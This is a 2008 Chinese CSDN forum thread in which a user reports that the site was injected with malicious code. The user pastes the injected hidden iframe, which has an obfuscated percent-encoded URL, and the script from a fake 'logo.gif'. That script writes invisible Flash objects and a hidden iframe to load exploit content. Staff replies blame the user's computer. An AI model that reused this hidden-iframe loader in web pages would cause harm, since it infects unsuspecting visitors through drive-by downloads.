CSDN的安全性太差了,连续被挂马,管理员在做什么?

快乐老猫 2008-09-27 11:48:21
如题。前天、昨天连续被挂。号称中国最大的程序员网站,就如此不堪一击么?
...全文
82 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
ptwhite 2008-10-07
  • 打赏
  • 举报
回复
尊敬的用户快乐老猫,您好:
根据您的反馈,我们查看了一下,并不是我们网站出现了问题,可能是您的电脑中了木马病毒,请您检查一下您的电脑,感谢您的反馈,如还有问题请再与我联系。
xueqinna 2008-10-05
  • 打赏
  • 举报
回复
前几天是有点问题。没想到。以后注意。
  • 打赏
  • 举报
回复
如此不堪一击
快乐老猫 2008-09-27
  • 打赏
  • 举报
回复
您好,我昨天打开论坛,金山毒霸就开始报警,包括网易、百度、CSDN、盒子论坛都有报警,google没有问题,前天CSDN、百度、盒子论坛发现病毒,当时检查了一下网页,网页的起始部分被插入了一个框架,代码如下:
<iframe src=http://%77%2E%63%39%39%78%2E%63%6E/logo.gif width=100 height=0></iframe>
金山如下日志如下:
2008-09-26 09:01:00 C:\Documents and Settings\ancl.ZJCL\Local Settings\Temporary Internet Files\Content.IE5\HTPT8PJN\logoCAEGXOX0.gif JS.Agent.ef.1349 清除成功

logo.gif 文件代码如下:
<SCRIPT LANGUAGE="javascript">
window.on_error=function(){return true;}
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf("tyeyede=")==-1)
{
var skpaopao=new Date();
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="tyeyede=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain"/>');
document.write('<param name="movie" value="ie.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="ie.swf"/>');
document.write('</object>');
}
else
{
document.write("<EMBED src=ff.swf width=0 height=0>");
}
document.writeln("<iframe src=next2.htm width=50 height=0><\/iframe>");}
</SCRIPT>
</BODY></HTML>
<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/745761/ystat.js";></script><noscript><a href="http://tongji.cn.yahoo.com";><img src="http://img.tongji.cn.yahoo.com/745761/ystat.gif";/></a></noscript>

==========================================================================================

图是没有了,金山毒霸一闪而过,没有时间截图。
ptwhite 2008-09-27
  • 打赏
  • 举报
回复
尊敬的用户快乐老猫,您好:
请问您是在进入哪个页面碰到这样的情况呢?能给我们发个页面的截图么?请直接与我联系:webmaster@csdn.net.

542

社区成员

发帖
与我相关
我的任务
社区描述
客服专区
其他 技术论坛(原bbs)
社区管理员
  • 客服专区社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧